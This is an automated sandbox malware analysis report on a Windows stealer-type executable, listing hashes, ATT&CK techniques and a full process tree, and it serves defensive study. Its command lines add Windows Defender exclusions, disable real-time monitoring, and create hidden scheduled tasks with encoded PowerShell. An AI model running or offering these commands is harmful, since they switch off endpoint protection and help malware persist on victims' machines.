2150c6d508e940cc0f6b8a56c2cb6d885ae778577e35bf360f83022423a664f5

Analysis

max time kernel
82s
max time network
247s
platform
windows7_x64
resource
win7-20240611-en
resource tags

arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
submitted
01-07-2024 05:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2150c6d508e940cc0f6b8a56c2cb6d885ae778577e35bf360f83022423a664f5.exe
Size

7.3MB
MD5

1a64cf0f414504536ce7d4c9b3e74548
SHA1

a06f2878ea572f5874b13ad80496cb4a3afaf493
SHA256

2150c6d508e940cc0f6b8a56c2cb6d885ae778577e35bf360f83022423a664f5
SHA512

06132328828a8c99d7a97984b1d41ad577831a931b6d6c841a89aa1560520057bb51d3909c107df3731b0a37527011e9eb736f1a7021abddcd76e4b6c9c8a8d5
SSDEEP

196608:91O7TJTwokWFEqg3dZmaktYppaXozYL0uK8f:3O7TJVkWFgXktYpmQ8T

Score

8^/10

execution spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.EXE

pid process

788 powershell.exe
2516 powershell.exe
2656 powershell.exe
2776 powershell.EXE
1572 powershell.EXE
2028 powershell.exe
1720 powershell.EXE
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Install.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe
Executes dropped EXE 3 IoCs

Processes:

Install.exeInstall.exeYHsvXFQ.exe

pid process

1308 Install.exe
2364 Install.exe
932 YHsvXFQ.exe
Loads dropped DLL 8 IoCs

Processes:

2150c6d508e940cc0f6b8a56c2cb6d885ae778577e35bf360f83022423a664f5.exeInstall.exeInstall.exe

pid process

1152 2150c6d508e940cc0f6b8a56c2cb6d885ae778577e35bf360f83022423a664f5.exe
1308 Install.exe
1308 Install.exe
1308 Install.exe
1308 Install.exe
2364 Install.exe
2364 Install.exe
2364 Install.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
788	powershell.exe
2516	powershell.exe
2656	powershell.exe
2776	powershell.EXE
1572	powershell.EXE
2028	powershell.exe
1720	powershell.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

pid	process
1308	Install.exe
2364	Install.exe
932	YHsvXFQ.exe

pid	process
1152	2150c6d508e940cc0f6b8a56c2cb6d885ae778577e35bf360f83022423a664f5.exe
1308	Install.exe
1308	Install.exe
1308	Install.exe
1308	Install.exe
2364	Install.exe
2364	Install.exe
2364	Install.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exeYHsvXFQ.exe

description	ioc	process
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	YHsvXFQ.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	YHsvXFQ.exe

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\bkulktKnsMWheyTcHH.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

2280 932 WerFault.exe YHsvXFQ.exe
2004 2364 WerFault.exe Install.exe
1916 2908 WerFault.exe LMmZPYp.exe
Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

Install.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe

description	ioc	process
File created	C:\Windows\Tasks\bkulktKnsMWheyTcHH.job	schtasks.exe

pid	pid_target	process	target process
2280	932	WerFault.exe	YHsvXFQ.exe
2004	2364	WerFault.exe	Install.exe
1916	2908	WerFault.exe	LMmZPYp.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2336	schtasks.exe
2268	schtasks.exe
1592	schtasks.exe
2036	schtasks.exe
1132	schtasks.exe
2384	schtasks.exe
2572	schtasks.exe
2504	schtasks.exe
1676	schtasks.exe
2544	schtasks.exe
2512	schtasks.exe
932	schtasks.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2656 powershell.exe

pid	process
2656	powershell.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

Processes:

powershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	2656	powershell.exe
Token: SeIncreaseQuotaPrivilege	2508	WMIC.exe
Token: SeSecurityPrivilege	2508	WMIC.exe
Token: SeTakeOwnershipPrivilege	2508	WMIC.exe
Token: SeLoadDriverPrivilege	2508	WMIC.exe
Token: SeSystemProfilePrivilege	2508	WMIC.exe
Token: SeSystemtimePrivilege	2508	WMIC.exe
Token: SeProfSingleProcessPrivilege	2508	WMIC.exe
Token: SeIncBasePriorityPrivilege	2508	WMIC.exe
Token: SeCreatePagefilePrivilege	2508	WMIC.exe
Token: SeBackupPrivilege	2508	WMIC.exe
Token: SeRestorePrivilege	2508	WMIC.exe
Token: SeShutdownPrivilege	2508	WMIC.exe
Token: SeDebugPrivilege	2508	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2508	WMIC.exe
Token: SeRemoteShutdownPrivilege	2508	WMIC.exe
Token: SeUndockPrivilege	2508	WMIC.exe
Token: SeManageVolumePrivilege	2508	WMIC.exe
Token: 33	2508	WMIC.exe
Token: 34	2508	WMIC.exe
Token: 35	2508	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2150c6d508e940cc0f6b8a56c2cb6d885ae778577e35bf360f83022423a664f5.exeInstall.exeInstall.exeforfiles.execmd.exepowershell.exetaskeng.exeYHsvXFQ.exetaskeng.exe

description	pid	process	target process
PID 1152 wrote to memory of 1308	1152	2150c6d508e940cc0f6b8a56c2cb6d885ae778577e35bf360f83022423a664f5.exe	Install.exe
PID 1152 wrote to memory of 1308	1152	2150c6d508e940cc0f6b8a56c2cb6d885ae778577e35bf360f83022423a664f5.exe	Install.exe
PID 1152 wrote to memory of 1308	1152	2150c6d508e940cc0f6b8a56c2cb6d885ae778577e35bf360f83022423a664f5.exe	Install.exe
PID 1152 wrote to memory of 1308	1152	2150c6d508e940cc0f6b8a56c2cb6d885ae778577e35bf360f83022423a664f5.exe	Install.exe
PID 1152 wrote to memory of 1308	1152	2150c6d508e940cc0f6b8a56c2cb6d885ae778577e35bf360f83022423a664f5.exe	Install.exe
PID 1152 wrote to memory of 1308	1152	2150c6d508e940cc0f6b8a56c2cb6d885ae778577e35bf360f83022423a664f5.exe	Install.exe
PID 1152 wrote to memory of 1308	1152	2150c6d508e940cc0f6b8a56c2cb6d885ae778577e35bf360f83022423a664f5.exe	Install.exe
PID 1308 wrote to memory of 2364	1308	Install.exe	Install.exe
PID 1308 wrote to memory of 2364	1308	Install.exe	Install.exe
PID 1308 wrote to memory of 2364	1308	Install.exe	Install.exe
PID 1308 wrote to memory of 2364	1308	Install.exe	Install.exe
PID 1308 wrote to memory of 2364	1308	Install.exe	Install.exe
PID 1308 wrote to memory of 2364	1308	Install.exe	Install.exe
PID 1308 wrote to memory of 2364	1308	Install.exe	Install.exe
PID 2364 wrote to memory of 2948	2364	Install.exe	forfiles.exe
PID 2364 wrote to memory of 2948	2364	Install.exe	forfiles.exe
PID 2364 wrote to memory of 2948	2364	Install.exe	forfiles.exe
PID 2364 wrote to memory of 2948	2364	Install.exe	forfiles.exe
PID 2364 wrote to memory of 2948	2364	Install.exe	forfiles.exe
PID 2364 wrote to memory of 2948	2364	Install.exe	forfiles.exe
PID 2364 wrote to memory of 2948	2364	Install.exe	forfiles.exe
PID 2948 wrote to memory of 2624	2948	forfiles.exe	cmd.exe
PID 2948 wrote to memory of 2624	2948	forfiles.exe	cmd.exe
PID 2948 wrote to memory of 2624	2948	forfiles.exe	cmd.exe
PID 2948 wrote to memory of 2624	2948	forfiles.exe	cmd.exe
PID 2948 wrote to memory of 2624	2948	forfiles.exe	cmd.exe
PID 2948 wrote to memory of 2624	2948	forfiles.exe	cmd.exe
PID 2948 wrote to memory of 2624	2948	forfiles.exe	cmd.exe
PID 2624 wrote to memory of 2656	2624	cmd.exe	powershell.exe
PID 2624 wrote to memory of 2656	2624	cmd.exe	powershell.exe
PID 2624 wrote to memory of 2656	2624	cmd.exe	powershell.exe
PID 2624 wrote to memory of 2656	2624	cmd.exe	powershell.exe
PID 2624 wrote to memory of 2656	2624	cmd.exe	powershell.exe
PID 2624 wrote to memory of 2656	2624	cmd.exe	powershell.exe
PID 2624 wrote to memory of 2656	2624	cmd.exe	powershell.exe
PID 2656 wrote to memory of 2508	2656	powershell.exe	cmd.exe
PID 2656 wrote to memory of 2508	2656	powershell.exe	cmd.exe
PID 2656 wrote to memory of 2508	2656	powershell.exe	cmd.exe
PID 2656 wrote to memory of 2508	2656	powershell.exe	cmd.exe
PID 2656 wrote to memory of 2508	2656	powershell.exe	cmd.exe
PID 2656 wrote to memory of 2508	2656	powershell.exe	cmd.exe
PID 2656 wrote to memory of 2508	2656	powershell.exe	cmd.exe
PID 2364 wrote to memory of 2036	2364	Install.exe	schtasks.exe
PID 2364 wrote to memory of 2036	2364	Install.exe	schtasks.exe
PID 2364 wrote to memory of 2036	2364	Install.exe	schtasks.exe
PID 2364 wrote to memory of 2036	2364	Install.exe	schtasks.exe
PID 2364 wrote to memory of 2036	2364	Install.exe	schtasks.exe
PID 2364 wrote to memory of 2036	2364	Install.exe	schtasks.exe
PID 2364 wrote to memory of 2036	2364	Install.exe	schtasks.exe
PID 924 wrote to memory of 932	924	taskeng.exe	schtasks.exe
PID 924 wrote to memory of 932	924	taskeng.exe	schtasks.exe
PID 924 wrote to memory of 932	924	taskeng.exe	schtasks.exe
PID 924 wrote to memory of 932	924	taskeng.exe	schtasks.exe
PID 932 wrote to memory of 1132	932	YHsvXFQ.exe	schtasks.exe
PID 932 wrote to memory of 1132	932	YHsvXFQ.exe	schtasks.exe
PID 932 wrote to memory of 1132	932	YHsvXFQ.exe	schtasks.exe
PID 932 wrote to memory of 1132	932	YHsvXFQ.exe	schtasks.exe
PID 932 wrote to memory of 1232	932	YHsvXFQ.exe	schtasks.exe
PID 932 wrote to memory of 1232	932	YHsvXFQ.exe	schtasks.exe
PID 932 wrote to memory of 1232	932	YHsvXFQ.exe	schtasks.exe
PID 932 wrote to memory of 1232	932	YHsvXFQ.exe	schtasks.exe
PID 1512 wrote to memory of 2776	1512	taskeng.exe	powershell.EXE
PID 1512 wrote to memory of 2776	1512	taskeng.exe	powershell.EXE
PID 1512 wrote to memory of 2776	1512	taskeng.exe	powershell.EXE

C:\Users\Admin\AppData\Local\Temp\2150c6d508e940cc0f6b8a56c2cb6d885ae778577e35bf360f83022423a664f5.exe
"C:\Users\Admin\AppData\Local\Temp\2150c6d508e940cc0f6b8a56c2cb6d885ae778577e35bf360f83022423a664f5.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1152

C:\Users\Admin\AppData\Local\Temp\7zS7DB8.tmp\Install.exe
.\Install.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1308

C:\Users\Admin\AppData\Local\Temp\7zS820B.tmp\Install.exe
.\Install.exe /QqdidYEOZ "385137" /S
3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2364

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
4⤵
- Suspicious use of WriteProcessMemory
PID:2948

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
5⤵
- Suspicious use of WriteProcessMemory
PID:2624

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2656

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2508

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bkulktKnsMWheyTcHH" /SC once /ST 05:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\MEjESHlTzhJRobPiA\YgRSiKsoVteJGtR\YHsvXFQ.exe\" 3T /DdidkRsm 385137 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2364 -s 624
4⤵
- Program crash
PID:2004

C:\Windows\system32\taskeng.exe
taskeng.exe {AD2FAB49-EA96-4E9B-AAA9-34F7695E36E3} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Suspicious use of WriteProcessMemory
PID:924

C:\Users\Admin\AppData\Local\Temp\MEjESHlTzhJRobPiA\YgRSiKsoVteJGtR\YHsvXFQ.exe
C:\Users\Admin\AppData\Local\Temp\MEjESHlTzhJRobPiA\YgRSiKsoVteJGtR\YHsvXFQ.exe 3T /DdidkRsm 385137 /S
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:932

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gAlalfgDt" /SC once /ST 02:00:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Scheduled Task/Job: Scheduled Task
PID:1132

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gAlalfgDt"
3⤵
PID:1232

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gAlalfgDt"
3⤵
PID:964

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
3⤵
PID:2556

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
4⤵
PID:1372

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
3⤵
PID:268

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
4⤵
PID:1320

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gsfQjoMpk" /SC once /ST 01:26:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Scheduled Task/Job: Scheduled Task
PID:2384

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gsfQjoMpk"
3⤵
PID:1028

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gsfQjoMpk"
3⤵
PID:1628

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
3⤵
PID:1652

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
4⤵
PID:2168

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
5⤵
- Command and Scripting Interpreter: PowerShell
PID:2028

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
6⤵
PID:2644

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jEUQWIQvPKxTkmGv" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2976

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jEUQWIQvPKxTkmGv" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2500

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jEUQWIQvPKxTkmGv" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2204

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jEUQWIQvPKxTkmGv" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2560

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jEUQWIQvPKxTkmGv" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2508

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jEUQWIQvPKxTkmGv" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2600

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jEUQWIQvPKxTkmGv" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2504

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jEUQWIQvPKxTkmGv" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2660

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\jEUQWIQvPKxTkmGv\SQjEkqxu\axohsoTRVkvyyZrc.wsf"
3⤵
PID:2924

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\jEUQWIQvPKxTkmGv\SQjEkqxu\axohsoTRVkvyyZrc.wsf"
3⤵
PID:2836

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DLOGhsaIU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2908

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DLOGhsaIU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:660

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JoukbHKXhnJgygRymeR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:764

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JoukbHKXhnJgygRymeR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1020

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LXFcSqNRPdfiC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2252

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LXFcSqNRPdfiC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:516

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bmRmotOcEZUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:560

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bmRmotOcEZUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1676

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dqJSprjCYNjU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1956

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dqJSprjCYNjU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2408

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\lKoxjEGWaXzMwnVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2396

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\lKoxjEGWaXzMwnVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2152

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2756

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1484

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\MEjESHlTzhJRobPiA" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2448

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\MEjESHlTzhJRobPiA" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2768

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jEUQWIQvPKxTkmGv" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2672

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jEUQWIQvPKxTkmGv" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2360

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DLOGhsaIU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2664

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DLOGhsaIU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1672

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JoukbHKXhnJgygRymeR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2840

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JoukbHKXhnJgygRymeR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1608

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LXFcSqNRPdfiC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1908

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LXFcSqNRPdfiC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:916

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bmRmotOcEZUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bmRmotOcEZUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2276

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dqJSprjCYNjU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1588

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dqJSprjCYNjU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:980

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\lKoxjEGWaXzMwnVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1288

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\lKoxjEGWaXzMwnVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:872

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2868

C:\Windows\SysWOW64\reg.exe
